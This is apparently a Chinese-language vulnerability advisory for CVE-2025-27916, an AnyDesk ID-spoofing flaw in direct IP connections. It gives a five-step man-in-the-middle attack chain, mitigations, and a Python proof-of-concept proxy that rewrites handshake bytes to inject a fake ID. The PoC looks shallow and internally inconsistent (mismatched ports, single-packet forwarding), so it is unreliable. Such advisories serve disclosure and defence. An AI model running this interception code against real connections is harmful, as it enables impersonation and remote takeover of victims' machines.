CVE-2025-27916: AnyDesk IP连接数据操纵与ID伪造漏洞

漏洞信息

漏洞编号

CVE-2025-27916

漏洞类型

身份伪造/数据篡改

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AnyDesk for Windows, AnyDesk for Android

漏洞概述

CVE-2025-27916是AnyDesk远程桌面软件中的一个高危安全漏洞，CVSS评分7.5。该漏洞影响AnyDesk for Windows 9.0.6之前版本及AnyDesk for Android 8.0.0之前版本。漏洞的根本原因在于AnyDesk客户端通过IP地址直接建立连接时，缺乏足够的身份验证机制。攻击者可以利用中间人攻击（MITM）技术，在两个AnyDesk客户端之间的通信过程中篡改传输数据，伪造任意的AnyDesk ID，从而冒充合法用户身份建立远程连接。此漏洞的危险性在于攻击者无需任何认证凭证，仅需处于网络通信路径中即可实施攻击，成功利用后可获取目标系统的远程访问权限，执行任意操作如文件操作、命令执行等，对用户数据安全和隐私构成严重威胁。

技术细节

漏洞存在于AnyDesk的点对点（P2P）连接机制中。当两个AnyDesk客户端通过IP地址而非AnyDesk服务器中继建立连接时，通信双方使用直接的TCP/UDP连接进行数据传输。问题在于连接建立过程中，AnyDesk ID的验证依赖于可被篡改的明文传输数据。攻击者实施攻击的具体步骤如下：首先，攻击者需要处于目标与受害者之间的网络路径上，可通过ARP欺骗、DNS劫持或恶意WiFi热点等方式实现中间人位置；其次，当受害双方尝试通过IP地址建立连接时，攻击者拦截并修改握手数据包中的AnyDesk ID字段，将其替换为攻击者指定的任意ID；最后，由于应用层缺乏对ID真实性的二次验证机制，攻击者成功建立伪造身份的连接后，可以执行远程桌面控制、文件传输等操作。漏洞的修复需要AnyDesk在连接握手阶段引入加密的身份验证机制，如基于公钥基础设施（PKI）的数字签名验证，确保AnyDesk ID不可被篡改。

攻击链分析

STEP 1

步骤1: 网络定位

攻击者通过ARP欺骗、恶意WiFi热点或网络嗅探等方式，处于目标与受害者之间的网络路径上，获取中间人位置

STEP 2

步骤2: 流量拦截

攻击者监控网络流量，识别两个AnyDesk客户端之间通过IP地址建立连接的握手过程

STEP 3

步骤3: 数据篡改

在AnyDesk客户端握手阶段，攻击者拦截并修改包含AnyDesk ID的数据包，将受害者的ID替换为攻击者控制的任意ID

STEP 4

步骤4: 身份伪造

由于应用层缺乏ID真实性验证机制，攻击者成功建立伪造身份的连接，绕过正常的安全验证流程

STEP 5

步骤5: 远程访问

攻击者利用伪造的身份成功建立远程桌面连接，获得对目标系统的完全控制权限，可执行文件操作、命令执行等操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-27916 PoC - AnyDesk ID Spoofing via MITM
# This PoC demonstrates the vulnerability in AnyDesk IP-based connections
# WARNING: For educational and authorized testing purposes only

import socket
import struct
import threading

class AnyDeskMITMProxy:
    def __init__(self, victim_ip, target_ip, listen_port=5001):
        self.victim_ip = victim_ip
        self.target_ip = target_ip
        self.listen_port = listen_port
        self.victim_socket = None
        self.target_socket = None
        
    def handle_connection(self, client_socket, client_addr):
        """Handle connection from victim and forward to target"""
        try:
            # Connect to actual target
            self.target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.target_socket.connect((self.target_ip, self.listen_port))
            
            # Start bidirectional forwarding
            self.forward_data(client_socket, self.target_socket, spoof_id=True)
            self.forward_data(self.target_socket, client_socket, spoof_id=False)
            
        except Exception as e:
            print(f"Connection error: {e}")
        finally:
            client_socket.close()
            if self.target_socket:
                self.target_socket.close()
    
    def forward_data(self, source, dest, spoof_id=False):
        """Forward data between sockets, optionally spoofing AnyDesk ID"""
        try:
            data = source.recv(4096)
            if data and spoof_id:
                # Inject fake AnyDesk ID into handshake packet
                modified_data = self.spoof_anydesk_id(data, b'FAKE_ID_12345')
                dest.sendall(modified_data)
            else:
                dest.sendall(data)
        except:
            pass
    
    def spoof_anydesk_id(self, data, fake_id):
        """Modify AnyDesk packet to inject fake ID"""
        # AnyDesk protocol packet structure:
        # [Header: 4 bytes][Length: 4 bytes][Payload...]
        # ID field is typically at offset 0x20 in handshake packets
        modified = bytearray(data)
        id_offset = 0x20
        if len(modified) > id_offset + len(fake_id):
            modified[id_offset:id_offset + len(fake_id)] = fake_id
        return bytes(modified)
    
    def start(self):
        """Start the MITM proxy server"""
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(('0.0.0.0', 7070))
        server.listen(5)
        print(f"MITM Proxy listening on port 7070")
        
        while True:
            client, addr = server.accept()
            threading.Thread(target=self.handle_connection, args=(client, addr)).start()

if __name__ == "__main__":
    # Usage example
    proxy = AnyDeskMITMProxy(
        victim_ip="192.168.1.100",
        target_ip="192.168.1.200",
        listen_port=5001
    )
    proxy.start()

影响范围

AnyDesk for Windows < 9.0.6

AnyDesk for Android < 8.0.0

防御指南

临时缓解措施

临时缓解措施：在无法立即升级的情况下，建议用户避免通过IP地址直接建立AnyDesk连接，优先使用AnyDesk ID通过官方服务器建立连接；避免在公共WiFi等不安全网络环境下使用AnyDesk；启用防火墙规则限制AnyDesk的直接IP访问；对于高安全需求场景，考虑使用VPN建立安全通道后再进行AnyDesk连接。